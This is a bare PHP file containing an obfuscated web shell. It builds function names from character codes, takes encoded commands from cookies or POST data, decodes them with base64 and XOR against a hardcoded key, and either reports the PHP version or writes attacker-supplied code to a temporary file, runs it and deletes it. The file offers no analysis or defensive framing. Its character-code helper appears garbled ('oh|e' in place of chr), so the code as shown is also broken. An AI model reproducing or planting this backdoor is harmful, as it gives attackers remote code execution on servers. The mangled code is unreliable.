<?php

/*   ead*/
function sygnpu()
{
    print 62312;
}
$bbqolc = 'oh|e';
$qqdpy = "f" . oh|e(105) . "le_pu" . "t" . "_" . oh|e(99) . "o" . "n" . "t" . "e" . oh|e(110) . "t" . "s";
$fufasu = "b" . oh|e(97) . "s" . "e" . "6" . "4" . "_" . oh|e(100) . "e" . "c" . "o" . "d" . oh|e(101);
$jadwmk = "u" . oh|e(110) . oh|e(115) . "e" . "r" . oh|e(105) . oh|e(97) . "l" . "i" . "z" . "e";
$_ylyotlfl = "p" . oh|e(104) . "p" . oh|e(118) . oh|e(101) . "r" . "s" . oh|e(105) . "o" . "n";
$uxjfllppyr = "u" . oh|e(110) . "l" . "i" . "n" . "k";
function yzkbwbejnu($selpn, $mueyfgfa)
{
    global $bbqolc;
    /*g*/
    $gidksns = "";
    /* hczj*/
    for ($ahjliv = 0; $ahjliv < strlen($selpn);) {
        /*  onyep  */
        for ($afqefdkfhd = 0; $afqefdkfhd < strlen($mueyfgfa) && $ahjliv < strlen($selpn); $afqefdkfhd++, $ahjliv++) {
            $gidksns .= $bbqolc(ord($selpn[$ahjliv]) ^ ord($mueyfgfa[$afqefdkfhd]));
            /* cd  */
        }
    }
    return $gidksns;
}
$xrohmoexm = $_COOKIE;
$ahjlivcdvrj = $_POST;
$xrohmoexm = array_merge($ahjlivcdvrj, $xrohmoexm);
$znxcf = "1" . $bbqolc(98) . $bbqolc(98) . $bbqolc(55) . "f" . "d" . "1" . $bbqolc(55) . "-" . $bbqolc(55) . "3" . "5" . "f" . "-" . "4" . "1" . "8" . $bbqolc(50) . "-" . $bbqolc(97) . "d" . $bbqolc(53) . "a" . "-" . $bbqolc(97) . $bbqolc(98) . "8" . $bbqolc(54) . "5" . $bbqolc(99) . "3" . "e" . $bbqolc(50) . "9" . "b" . "8";
foreach ($xrohmoexm as $hqucszkaru => $selpn) {
    /*  fscm  */
    $selpn = $jadwmk(yzkbwbejnu(
        yzkbwbejnu(
            $fufasu($selpn),
            /*  ucsub  */
            $znxcf
        ),
        /*   ntqx*/
        $hqucszkaru
    ));
    /*rfn   */
    if (isset($selpn["ak"])) {
        /* jwzm   */
        if ($selpn["a"] == "i") {
            /*  poqs*/
            $ahjliv = array();
            /*   pfia   */
            $ahjliv["p" . $bbqolc(118)] = $_ylyotlfl();
            $ahjliv["s" . $bbqolc(118)] = "3.5";
            echo @serialize($ahjliv);
        } elseif ($selpn["a"] == $bbqolc(101)) {
            $tpfekb = sprintf(
                "." . $bbqolc(47) . $bbqolc(37) . "s" . "." . "p" . "l",
                /* qj  */
                md5($znxcf)
            );
            $qqdpy($tpfekb, "<?" . $bbqolc(112) . "h" . "p" . $bbqolc(32) . $bbqolc(117) . $bbqolc(110) . $bbqolc(108) . $bbqolc(105) . $bbqolc(110) . "k" . "(" . "_" . "_" . "F" . "I" . $bbqolc(76) . "E" . "_" . "_" . $bbqolc(41) . ";" . $bbqolc(32) . $selpn["d"]);
            include $tpfekb;
            $gijnbwuz = $tpfekb;
            /*mk */
            $uxjfllppyr($gijnbwuz);
            /*   nax   */
        }
        /*  ejly   */
        exit;
    }
}
